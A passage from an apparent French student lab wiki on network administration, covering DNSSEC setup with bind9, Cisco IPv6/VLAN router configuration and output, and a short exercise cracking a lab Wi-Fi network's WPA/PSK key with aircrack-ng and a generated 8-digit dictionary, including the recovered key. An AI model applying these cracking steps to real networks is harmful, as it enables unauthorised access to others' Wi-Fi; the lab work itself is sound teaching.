Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Installation de DNSSEC===&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
==Séance 3.5 : 14/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Craquage WPA/PSK par dictionnaire===&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
====Récupération du handshake====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
====Rappel montage USB====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
====Crack WPA/PSK====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
==Séance 4 : 17/12/2018==&lt;br /&gt;
===Correction IPV6 routeur===&lt;br /&gt;
&lt;br /&gt;
==== Vlan 43 - XEN ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 131 - Interconnexion ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 10+N - Groupe N ====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vérifications du fonctionnement ====&lt;br /&gt;
&lt;br /&gt;
===== show running-config =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
===== Show Interface status =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
===== IPv6 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
